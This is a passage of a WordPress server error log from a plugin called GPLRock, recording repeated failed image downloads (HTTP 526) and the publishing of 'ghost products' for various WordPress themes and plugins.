UTC] GPLRock WARNING: Image download failed for product betlab-sports-betting-platform. URL: https://meldwp.com/wp-content/uploads/betlab---sports-betting-platform-19383.webp [05-Apr-2026 19:31:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: betlab-sports-betting-platform [05-Apr-2026 19:31:07 UTC] GPLRock: Image download failed for product woocommerce-discount-for-students-instant-verification-by-university-emails (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:09 UTC] GPLRock: Image download failed for product woocommerce-discount-for-students-instant-verification-by-university-emails (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-discount-for-students---instant-verification-by-university-emails-13245.webp for product woocommerce-discount-for-students-instant-verification-by-university-emails after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:11 UTC] GPLRock: Image download failed for product woocommerce-discount-for-students-instant-verification-by-university-emails (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:13 UTC] GPLRock: Image download failed for product woocommerce-discount-for-students-instant-verification-by-university-emails (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-discount-for-students---instant-verification-by-university-emails-13245.webp for product woocommerce-discount-for-students-instant-verification-by-university-emails after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:15 UTC] GPLRock WARNING: Image download failed for product woocommerce-discount-for-students-instant-verification-by-university-emails. URL: https://meldwp.com/wp-content/uploads/woocommerce-discount-for-students---instant-verification-by-university-emails-13245.webp [05-Apr-2026 19:31:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-discount-for-students-instant-verification-by-university-emails [05-Apr-2026 19:31:15 UTC] GPLRock: Image download failed for product wpforms-pipedrive-crm-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:18 UTC] GPLRock: Image download failed for product wpforms-pipedrive-crm-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms---pipedrive-crm---integration-23135.webp for product wpforms-pipedrive-crm-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:20 UTC] GPLRock: Image download failed for product wpforms-pipedrive-crm-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:22 UTC] GPLRock: Image download failed for product wpforms-pipedrive-crm-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpforms---pipedrive-crm---integration-23135.webp for product wpforms-pipedrive-crm-integration after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:24 UTC] GPLRock WARNING: Image download failed for product wpforms-pipedrive-crm-integration. URL: https://meldwp.com/wp-content/uploads/wpforms---pipedrive-crm---integration-23135.webp [05-Apr-2026 19:31:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpforms-pipedrive-crm-integration [05-Apr-2026 19:31:24 UTC] GPLRock: Image download failed for product woocommerce-customer-relationship-management-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:26 UTC] GPLRock: Image download failed for product woocommerce-customer-relationship-management-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-relationship-management-crm-18673.webp for product woocommerce-customer-relationship-management-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:29 UTC] GPLRock: Image download failed for product woocommerce-customer-relationship-management-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:31 UTC] GPLRock: Image download failed for product woocommerce-customer-relationship-management-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-relationship-management-crm-18673.webp for product woocommerce-customer-relationship-management-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:33 UTC] GPLRock WARNING: Image download failed for product woocommerce-customer-relationship-management-crm. URL: https://meldwp.com/wp-content/uploads/woocommerce-customer-relationship-management-crm-18673.webp [05-Apr-2026 19:31:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-customer-relationship-management-crm [05-Apr-2026 19:31:33 UTC] GPLRock: Image downloaded successfully for product pillow-testimonial-addon-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4106ec5e.webp [05-Apr-2026 19:31:33 UTC] GPLRock: Using pre-downloaded image for product pillow-testimonial-addon-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4106ec5e.webp [05-Apr-2026 19:31:33 UTC] GPLRock: Ghost product published with image - Product ID: pillow-testimonial-addon-wpbakery-page-builder [05-Apr-2026 19:43:00 UTC] GPLRock: Image downloaded successfully for product woocommerce-email-customizer-with-drag-and-drop-email-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-787fad56.jpg [05-Apr-2026 19:43:00 UTC] GPLRock: Using pre-downloaded image for product woocommerce-email-customizer-with-drag-and-drop-email-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-787fad56.jpg [05-Apr-2026 19:43:00 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-email-customizer-with-drag-and-drop-email-builder [05-Apr-2026 19:43:01 UTC] GPLRock: Image downloaded successfully for product gravityview-ratings-reviews (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93bf69c5.jpg [05-Apr-2026 19:43:02 UTC] GPLRock: Using pre-downloaded image for product gravityview-ratings-reviews: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-93bf69c5.jpg [05-Apr-2026 19:43:02 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-ratings-reviews [05-Apr-2026 19:43:04 UTC] GPLRock: Image downloaded successfully for product event-management-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c55bcd30.jpg [05-Apr-2026 19:43:04 UTC] GPLRock: Using pre-downloaded image for product event-management-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c55bcd30.jpg [05-Apr-2026 19:43:04 UTC] GPLRock: Ghost product published with image - Product ID: event-management-wordpress-theme [05-Apr-2026 19:43:06 UTC] GPLRock: Image downloaded successfully for product decades-app-showcase-app-store-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383a33d6.jpg [05-Apr-2026 19:43:06 UTC] GPLRock: Using pre-downloaded image for product decades-app-showcase-app-store-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383a33d6.jpg [05-Apr-2026 19:43:06 UTC] GPLRock: Ghost product published with image - Product ID: decades-app-showcase-app-store-wordpress-theme [05-Apr-2026 19:43:08 UTC] GPLRock: Image downloaded successfully for product aboss-responsive-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c7c715b.jpg [05-Apr-2026 19:43:08 UTC] GPLRock: Using pre-downloaded image for product aboss-responsive-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6c7c715b.jpg [05-Apr-2026 19:43:08 UTC] GPLRock: Ghost product published with image - Product ID: aboss-responsive-theme-for-woocommerce-wordpress [05-Apr-2026 19:43:10 UTC] GPLRock: Image downloaded successfully for product scientia-public-library-book-store-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36b24203.png [05-Apr-2026 19:43:10 UTC] GPLRock: Using pre-downloaded image for product scientia-public-library-book-store-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36b24203.png [05-Apr-2026 19:43:10 UTC] GPLRock: Ghost product published with image - Product ID: scientia-public-library-book-store-education-wordpress-theme [05-Apr-2026 19:43:12 UTC] GPLRock: Image downloaded successfully for product piqes-creative-startup-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f9fbd44.png [05-Apr-2026 19:43:12 UTC] GPLRock: Using pre-downloaded image for product piqes-creative-startup-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f9fbd44.png [05-Apr-2026 19:43:12 UTC] GPLRock: Ghost product published with image - Product ID: piqes-creative-startup-agency-wordpress-theme [05-Apr-2026 19:43:14 UTC] GPLRock: Image downloaded successfully for product brixey-responsive-architecture-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7df9eb32.jpg [05-Apr-2026 19:43:14 UTC] GPLRock: Using pre-downloaded image for product brixey-responsive-architecture-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7df9eb32.jpg [05-Apr-2026 19:43:14 UTC] GPLRock: Ghost product published with image - Product ID: brixey-responsive-architecture-wordpress-theme [05-Apr-2026 19:43:15 UTC] GPLRock: Image downloaded successfully for product exqute-painting-company-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad707e02.jpg [05-Apr-2026 19:43:15 UTC] GPLRock: Using pre-downloaded image for product exqute-painting-company-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad707e02.jpg [05-Apr-2026 19:43:15 UTC] GPLRock: Ghost product published with image - Product ID: exqute-painting-company-wordpress-theme [05-Apr-2026 19:43:17 UTC] GPLRock: Image downloaded successfully for product exproduct-single-product-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea91f4b3.jpg [05-Apr-2026 19:43:17 UTC] GPLRock: Using pre-downloaded image for product exproduct-single-product-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea91f4b3.jpg [05-Apr-2026 19:43:17 UTC] GPLRock: Ghost product published with image - Product ID: exproduct-single-product-theme [05-Apr-2026 19:44:36 UTC] GPLRock: Image download failed for product innox-industrial-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:38 UTC] GPLRock: Image download failed for product innox-industrial-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/innox---industrial-wordpress-elementor-theme-25742.webp for product innox-industrial-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:44:40 UTC] GPLRock: Image download failed for product innox-industrial-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:42 UTC] GPLRock: Image download failed for product innox-industrial-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/innox---industrial-wordpress-elementor-theme-25742.webp for product innox-industrial-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:44:44 UTC] GPLRock WARNING: Image download failed for product innox-industrial-wordpress-elementor-theme. URL: https://meldwp.com/wp-content/uploads/innox---industrial-wordpress-elementor-theme-25742.webp [05-Apr-2026 19:44:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: innox-industrial-wordpress-elementor-theme [05-Apr-2026 19:44:44 UTC] GPLRock: Image download failed for product papermag-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:47 UTC] GPLRock: Image download failed for product papermag-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/papermag---newspaper-magazine-wordpress-theme-4944.webp for product papermag-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:44:49 UTC] GPLRock: Image download failed for product papermag-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:51 UTC] GPLRock: Image download failed for product papermag-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/papermag---newspaper-magazine-wordpress-theme-4944.webp for product papermag-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:44:53 UTC] GPLRock WARNING: Image download failed for product papermag-newspaper-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/papermag---newspaper-magazine-wordpress-theme-4944.webp [05-Apr-2026 19:44:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: papermag-newspaper-magazine-wordpress-theme [05-Apr-2026 19:44:53 UTC] GPLRock: Image download failed for product ewed-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:55 UTC] GPLRock: Image download failed for product ewed-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ewed---wedding-wordpress-theme-652.webp for product ewed-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:44:58 UTC] GPLRock: Image download failed for product ewed-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:00 UTC] GPLRock: Image download failed for product ewed-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ewed---wedding-wordpress-theme-652.webp for product ewed-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:02 UTC] GPLRock WARNING: Image download failed for product ewed-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ewed---wedding-wordpress-theme-652.webp [05-Apr-2026 19:45:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ewed-wedding-wordpress-theme [05-Apr-2026 19:45:03 UTC] GPLRock: Image download failed for product baza-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:05 UTC] GPLRock: Image download failed for product baza-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baza---creative-multipurpose-wordpress-theme-2094.webp for product baza-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:07 UTC] GPLRock: Image download failed for product baza-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:09 UTC] GPLRock: Image download failed for product baza-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/baza---creative-multipurpose-wordpress-theme-2094.webp for product baza-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:11 UTC] GPLRock WARNING: Image download failed for product baza-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/baza---creative-multipurpose-wordpress-theme-2094.webp [05-Apr-2026 19:45:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: baza-creative-multipurpose-wordpress-theme [05-Apr-2026 19:45:11 UTC] GPLRock: Image download failed for product techbiz-it-solution-business-consulting-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:13 UTC] GPLRock: Image download failed for product techbiz-it-solution-business-consulting-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techbiz---it-solution--business-consulting-service-wordpress-theme-12465.webp for product techbiz-it-solution-business-consulting-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:16 UTC] GPLRock: Image download failed for product techbiz-it-solution-business-consulting-service-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:18 UTC] GPLRock: Image download failed for product techbiz-it-solution-business-consulting-service-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techbiz---it-solution--business-consulting-service-wordpress-theme-12465.webp for product techbiz-it-solution-business-consulting-service-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:20 UTC] GPLRock WARNING: Image download failed for product techbiz-it-solution-business-consulting-service-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techbiz---it-solution--business-consulting-service-wordpress-theme-12465.webp [05-Apr-2026 19:45:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techbiz-it-solution-business-consulting-service-wordpress-theme [05-Apr-2026 19:45:20 UTC] GPLRock: Image downloaded successfully for product voice-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00171595.webp [05-Apr-2026 19:45:20 UTC] GPLRock: Using pre-downloaded image for product voice-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00171595.webp [05-Apr-2026 19:45:20 UTC] GPLRock: Ghost product published with image - Product ID: voice-news-magazine-wordpress-theme [05-Apr-2026 19:45:20 UTC] GPLRock: Image download failed for product ambiense-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:22 UTC] GPLRock: Image download failed for product ambiense-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ambiense---restaurant--cafe-wordpress-theme-29704.webp for product ambiense-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:24 UTC] GPLRock: Image download failed for product ambiense-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:26 UTC] GPLRock: Image download failed for product ambiense-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ambiense---restaurant--cafe-wordpress-theme-29704.webp for product ambiense-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:28 UTC] GPLRock WARNING: Image download failed for product ambiense-restaurant-cafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ambiense---restaurant--cafe-wordpress-theme-29704.webp [05-Apr-2026 19:45:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ambiense-restaurant-cafe-wordpress-theme [05-Apr-2026 19:45:29 UTC] GPLRock: Image download failed for product golfer-golf-club-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:31 UTC] GPLRock: Image download failed for product golfer-golf-club-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golfer---golf-club--course-wordpress-theme-18174.webp for product golfer-golf-club-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:33 UTC] GPLRock: Image download failed for product golfer-golf-club-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:35 UTC] GPLRock: Image download failed for product golfer-golf-club-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golfer---golf-club--course-wordpress-theme-18174.webp for product golfer-golf-club-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:37 UTC] GPLRock WARNING: Image download failed for product golfer-golf-club-course-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/golfer---golf-club--course-wordpress-theme-18174.webp [05-Apr-2026 19:45:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: golfer-golf-club-course-wordpress-theme [05-Apr-2026 19:45:37 UTC] GPLRock: Image download failed for product zakat-onepage-nonprofit-charity-help-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:39 UTC] GPLRock: Image download failed for product zakat-onepage-nonprofit-charity-help-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zakat---onepage-nonprofit-charity-help-wordpress-theme-20963.webp for product zakat-onepage-nonprofit-charity-help-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:42 UTC] GPLRock: Image download failed for product zakat-onepage-nonprofit-charity-help-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:44 UTC] GPLRock: Image download failed for product zakat-onepage-nonprofit-charity-help-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zakat---onepage-nonprofit-charity-help-wordpress-theme-20963.webp for product zakat-onepage-nonprofit-charity-help-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:46 UTC] GPLRock WARNING: Image download failed for product zakat-onepage-nonprofit-charity-help-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zakat---onepage-nonprofit-charity-help-wordpress-theme-20963.webp [05-Apr-2026 19:45:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zakat-onepage-nonprofit-charity-help-wordpress-theme [05-Apr-2026 19:45:46 UTC] GPLRock: Image download failed for product nutritix-supplement-nutrition-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:48 UTC] GPLRock: Image download failed for product nutritix-supplement-nutrition-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutritix---supplement--nutrition-woocommerce-theme-1428.webp for product nutritix-supplement-nutrition-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:50 UTC] GPLRock: Image download failed for product nutritix-supplement-nutrition-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:52 UTC] GPLRock: Image download failed for product nutritix-supplement-nutrition-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:45:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutritix---supplement--nutrition-woocommerce-theme-1428.webp for product nutritix-supplement-nutrition-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:45:55 UTC] GPLRock WARNING: Image download failed for product nutritix-supplement-nutrition-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/nutritix---supplement--nutrition-woocommerce-theme-1428.webp [05-Apr-2026 19:45:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nutritix-supplement-nutrition-woocommerce-theme [05-Apr-2026 19:46:31 UTC] GPLRock: Image download failed for product rib-eye-steakhouse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:33 UTC] GPLRock: Image download failed for product rib-eye-steakhouse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rib-eye--steakhouse-wordpress-theme-26424.webp for product rib-eye-steakhouse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:36 UTC] GPLRock: Image download failed for product rib-eye-steakhouse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:38 UTC] GPLRock: Image download failed for product rib-eye-steakhouse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rib-eye--steakhouse-wordpress-theme-26424.webp for product rib-eye-steakhouse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:40 UTC] GPLRock WARNING: Image download failed for product rib-eye-steakhouse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rib-eye--steakhouse-wordpress-theme-26424.webp [05-Apr-2026 19:46:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rib-eye-steakhouse-wordpress-theme [05-Apr-2026 19:46:40 UTC] GPLRock: Image download failed for product sikra-supplement-nutrition-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:42 UTC] GPLRock: Image download failed for product sikra-supplement-nutrition-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sikra--supplement--nutrition-store-wordpress-theme-14832.webp for product sikra-supplement-nutrition-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:44 UTC] GPLRock: Image download failed for product sikra-supplement-nutrition-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:46 UTC] GPLRock: Image download failed for product sikra-supplement-nutrition-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sikra--supplement--nutrition-store-wordpress-theme-14832.webp for product sikra-supplement-nutrition-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:48 UTC] GPLRock WARNING: Image download failed for product sikra-supplement-nutrition-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sikra--supplement--nutrition-store-wordpress-theme-14832.webp [05-Apr-2026 19:46:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sikra-supplement-nutrition-store-wordpress-theme [05-Apr-2026 19:46:49 UTC] GPLRock: Image download failed for product lizar-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:51 UTC] GPLRock: Image download failed for product lizar-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lizar---creative-portfolio-wordpress-theme-24339.webp for product lizar-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:53 UTC] GPLRock: Image download failed for product lizar-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:55 UTC] GPLRock: Image download failed for product lizar-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lizar---creative-portfolio-wordpress-theme-24339.webp for product lizar-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:46:57 UTC] GPLRock WARNING: Image download failed for product lizar-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lizar---creative-portfolio-wordpress-theme-24339.webp [05-Apr-2026 19:46:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lizar-creative-portfolio-wordpress-theme [05-Apr-2026 19:46:57 UTC] GPLRock: Image download failed for product vindors-windows-doors-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:46:59 UTC] GPLRock: Image download failed for product vindors-windows-doors-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vindors---windows--doors-company-wordpress-theme-29038.webp for product vindors-windows-doors-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: 